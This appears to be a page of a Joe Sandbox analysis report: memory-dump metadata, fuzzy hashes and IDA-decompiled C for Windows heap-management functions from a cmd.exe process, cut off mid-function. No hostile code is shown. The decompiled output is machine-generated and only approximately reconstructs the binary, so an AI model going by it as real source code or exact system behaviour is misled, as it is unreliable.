0x036f4e1b
0x036f4e30
0x036f4e5b
0x036f4e5b
0x00000000
0x036f4e30
0x036f4e11
0x036f4e11
0x036f4e16
0x00000000
0x036f4e16
0x036f4e01
0x00000000
0x036f4e01
0x036f4da5
0x03736c6b
0x00000000
0x036f4dab
0x036f4dab
0x00000000
0x036f4dab

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b225514ac982c8034cb0844650d22ea370d7364af43c9d7b9dcf1554a9cb5c78
Instruction ID: d987703d191314af68aa706fc0601bf701e4dee543a0214cb88f663037b47c98
Opcode Fuzzy Hash: b225514ac982c8034cb0844650d22ea370d7364af43c9d7b9dcf1554a9cb5c78
Instruction Fuzzy Hash: D2411275A00318AFEB32DF25CC80FABB7A9EF45614F0400A9EA459B681DB74ED44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03792B28 Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03792B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x37b6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E036E2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x37b6110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E0379241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E036DFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E03793209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E0378A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E036DFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E0378A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x37b6110; // 0x16cffc9d
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x03792b28
0x03792b30
0x03792b35
0x03792b37
0x03792b3a
0x03792b3d
0x03792b44
0x03792b4d
0x03792b4d
0x03792b50
0x03792b54
0x03792bb0
0x03792bbd
0x03792be8
0x03792bef
0x03792bf4
0x03792bf7
0x03792bfa
0x03792bfd
0x03792c02
0x03792c02
0x03792c0f
0x03792c13
0x03792c3b
0x03792c4a
0x03792c4f
0x03792c52
0x03792c52
0x03792c59
0x03792c62
0x03792c62
0x03792c69
0x03792c15
0x03792c18
0x03792c19
0x03792c21
0x03792c29
0x03792c2f
0x03792c2f
0x03792c29
0x03792bbf
0x03792bc2
0x03792bc3
0x03792bc9
0x03792bc9
0x03792c72
0x03792c72
0x03792b56
0x03792b5c
0x03792b62
0x03792b64
0x03792b72
0x03792b77
0x03792ba3
0x03792ba3
0x03792ba5
0x03792baa
0x00000000
0x03792baa
0x03792b7e
0x03792b84
0x03792b86
0x03792b97
0x03792b9c
0x03792b9e
0x03792b9e
0x00000000
0x03792b9e
0x03792b8b
0x03792b90
0x00000000
0x00000000
0x03792b95
0x00000000
0x03792b95
0x03792b6b
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d04caf23c3bc81fbfbc95b0570b9b0a36ae3e554ddaefb62a24c40fb44d4d0
Instruction ID: 4445e0dec305572f5b4f4be98a2d11591a238523b168cf953d6fdc404921df7e
Opcode Fuzzy Hash: c2d04caf23c3bc81fbfbc95b0570b9b0a36ae3e554ddaefb62a24c40fb44d4d0
Instruction Fuzzy Hash: 34412E77B1050D7BEB14EF28D88497AB7E9EF48210B148F6AE915CB241E634DD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0378D466 Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0378D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x37bd360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x37b6114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E0378DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x37b6114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x37b6114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x37bb1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x37b6110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E0378D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E036DFFB0(_t69, _t90, _t90 + 0xc);
				}
				return E0370B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

0x0378d475
0x0378d47b
0x0378d492
0x0378d49e
0x0378d4a4
0x0378d4ac
0x0378d4bc
0x0378d4be
0x0378d4c4
0x0378d4cc
0x0378d4dc
0x0378d4e1
0x0378d4f5
0x0378d4fb
0x0378d4fd
0x0378d501
0x0378d53d
0x0378d503
0x0378d507
0x0378d50e
0x0378d510
0x0378d520
0x0378d524
0x0378d526
0x0378d528
0x0378d52b
0x0378d52e
0x0378d530
0x0378d530
0x0378d533
0x0378d536
0x0378d537
0x0378d53b
0x00000000
0x00000000
0x0378d526
0x0378d4c6
0x0378d4c6
0x0378d4c8
0x0378d4c8
0x0378d4c8
0x0378d540
0x0378d545
0x0378d555
0x0378d55a
0x0378d55a
0x0378d560
0x0378d562
0x0378d56e
0x0378d56e
0x0378d577
0x0378d57d
0x0378d57d
0x0378d594
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f360bbc9bba5e4b6780216abc2109b679def09bbfad9fdc3387ba068247195f
Instruction ID: 1bc723f615f74da2cdffcd7f30b4005b4463edb0e4c8099832f8e5b4e1675bf7
Opcode Fuzzy Hash: 1f360bbc9bba5e4b6780216abc2109b679def09bbfad9fdc3387ba068247195f
Instruction Fuzzy Hash: F3419671E001299BCB24EF99C881ABEF7F9FF88214B15416AE915EB284D774DD05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 036D8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E036D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x37bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0370B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E036DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x36a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E036F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03703C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E036D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x036d8a0a
0x036d8a1c
0x036d8a23
0x036d8a2e
0x036d8a30
0x036d8a36
0x036d8a3c
0x036d8a3e
0x036d8a4a
0x036d8a52
0x036d8a9c
0x036d8aae
0x036d8a58
0x036d8a5e
0x036d8a6a
0x036d8a6f
0x036d8a75
0x036d8a7d
0x036d8a85
0x036d8a86
0x036d8a89
0x036d8a93
0x036d8a99
0x036d8a9b
0x00000000
0x036d8aaf
0x036d8abe
0x036d8ac3
0x036d8acb
0x036d8ad7
0x036d8ae0
0x036d8af1
0x00000000
0x036d8af1
0x036d8acd
0x036d8ad5
0x036d8afb
0x036d8afd
0x036d8aff
0x036d8b07
0x036d8b22
0x036d8b24
0x036d8b2a
0x036d8b2e
0x036d8b3f
0x036d8b78
0x036d8b41
0x036d8b52
0x036d8b54
0x036d8b5c
0x036d8b74
0x036d8b74
0x036d8b5c
0x036d8b3f
0x036d8b5e
0x036d8b61
0x036d8b64
0x036d8b64
0x036d8b6c
0x036d8b6c
0x036d8b11
0x03729cd5
0x03729cd5
0x036d8b17
0x036d8b1a
0x036d8b1a
0x00000000
0x036d8ad5
0x036d8a89

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 134828c62442ffb223e197610abeb43a0e60ae8c8772b3a72cd193bcd2fbf348
Instruction ID: 45be2f6765a2848743817fd4dca3a6b6dc106e90e34f96dce5513118f0e3db46
Opcode Fuzzy Hash: 134828c62442ffb223e197610abeb43a0e60ae8c8772b3a72cd193bcd2fbf348
Instruction Fuzzy Hash: 59415EB4E003289BDB24DF59C98CAAAB7F8EB44300F1445E9D9199B341E7709E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0378AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0378AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0378ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0378AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0378AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0376CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L036E77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E036E7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0378131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0376CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0378aa1f
0x0378aa21
0x0378aa23
0x0378aa2b
0x0378aa30
0x0378aa36
0x0378aa39
0x0378aa42
0x0378aa75
0x0378aa7a
0x0378aa7c
0x0378aa7c
0x0378aa88
0x0378aa8a
0x0378aa8f
0x0378ab02
0x0378ab04
0x0378aa99
0x0378aaa8
0x0378aaaf
0x0378aab3
0x0378aacc
0x0378aad1
0x0378aad6
0x0378aae0
0x0378aaf3
0x0378aaf9
0x0378aafe
0x0378aafe
0x0378aaf3
0x0378aad6
0x0378aab3
0x0378ab07
0x0378ab0a
0x0378ab11
0x0378ab23
0x0378ab13
0x0378ab1c
0x0378ab1c
0x0378ab2b
0x0378ab44
0x0378ab44
0x0378ab51
0x0378ab51
0x0378aa44
0x0378aa47
0x0378aa4c
0x00000000
0x00000000
0x0378aa5a
0x0378aa64
0x0378aa72
0x00000000
0x0378aa66
0x0378aa66
0x0378aa68
0x0378aa6a
0x00000000
0x0378aa6a

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: ea2e38cef224afe5cfcb7cd7b61e1b208dd69e4d9261520b3f180fee87463374
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 61310236F502446BDB55EB69C845FAFFBBBEF84210F09806AE805AB291DA74CD00CA50

Uniqueness

Uniqueness Score: -1.00%

Function 037922AE Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E037922AE(void* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				void* _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				void* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E037921E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x36aac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x36aac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x36aac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x36aac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x37b6110; // 0x16cffc9d
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x37b6110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E036DFFB0(_t77, _t114, _t114);
						}
						_t63 = E03792FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E036E2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x037922b9
0x037922c2
0x037922c6
0x037922c8
0x037922d8
0x037922e2
0x03792303
0x03792314
0x03792321
0x0379234a
0x0379235b
0x0379236c
0x03792372
0x03792376
0x0379238f
0x0379238f
0x037923b4
0x037923c6
0x037923c9
0x037923cc
0x037923cf
0x037923cf
0x037923e9
0x037923ee
0x037923f8
0x037923fb
0x037923fb
0x03792403
0x0379240a
0x03792378
0x0379237b
0x03792381
0x03792385
0x03792385
0x0379238d
0x00000000
0x00000000
0x0379238d
0x03792376
0x03792417

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab17529ce234abdbc6bd5b8c67252ea03edf91a8d891fd7a543884f6bcc677f
Instruction ID: b3a66bd1c49f7d5caa8f96dbfc708bdaebb964e9f73b0e9b84d4d992c16ff036
Opcode Fuzzy Hash: 3ab17529ce234abdbc6bd5b8c67252ea03edf91a8d891fd7a543884f6bcc677f
Instruction Fuzzy Hash: AF410871114341AFE744DF28D8A197ABBE1EF85221F044B5EF4D68B282CB34D80ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0378FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0378FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0378FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03790A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E036E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03781608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03792B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0378C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0378DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E036E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0378A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0378fde7
0x0378fde8
0x0378fdec
0x0378fdee
0x0378fdf5
0x0378fdf7
0x0378fdfc
0x0378fe19
0x0378fe22
0x0378fe26
0x0378fec6
0x0378fecd
0x0378fed5
0x0378fee7
0x0378fed7
0x0378fee0
0x0378fee0
0x0378feef
0x0378ff00
0x0378ff02
0x0378ff07
0x0378ff07
0x00000000
0x0378feef
0x0378fe33
0x0378fe55
0x0378fe59
0x0378fe5b
0x0378fe5e
0x0378fe69
0x0378fe6d
0x0378fe6d
0x0378fe69
0x0378fe35
0x0378fe41
0x0378fe41
0x0378fe79
0x0378fe8b
0x0378fe7b
0x0378fe84
0x0378fe84
0x0378fe93
0x00000000
0x0378fea8
0x0378feba
0x00000000
0x0378feba
0x0378fdfe
0x0378fe01
0x0378fe02
0x0378fe08
0x0378ff0c
0x0378ff14
0x0378ff14

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 6760141682d0c3b60aee656321a1c991bd1e3eb9910d12386efa8e13836add32
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: EF31F236380644AFD722EB68E848F6ABBEAEFC5650F1C4559E846CB342DB74D841C720

Uniqueness

Uniqueness Score: -1.00%

Function 037920A8 Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E037920A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x37b6110; // 0x16cffc9d
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x37b6110; // 0x16cffc9d
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E03792E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x37b6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E03792E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x37b6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E03792E3F(_v8, _t79, _t113, _t73);
